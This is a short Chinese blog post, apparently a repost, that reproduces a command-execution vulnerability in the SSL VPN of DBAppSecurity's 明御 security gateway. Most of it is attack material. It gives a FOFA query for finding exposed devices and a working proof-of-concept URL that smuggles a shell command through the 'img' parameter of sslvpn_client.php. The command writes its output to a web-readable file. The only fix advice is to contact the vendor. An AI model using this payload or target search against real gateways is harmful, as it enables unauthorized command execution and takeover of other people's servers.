本文主要是介绍【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Nx01 产品简介
明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。
Nx02 漏洞描述
明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。
Nx03 产品主页
fofa-query: web.body="明御安全网关"
Nx04 漏洞复现
POC:
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls
拼接URL/sslvpn/ceshi.txt
Nx05 修复建议
建议联系软件厂商进行处理。
这篇关于【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
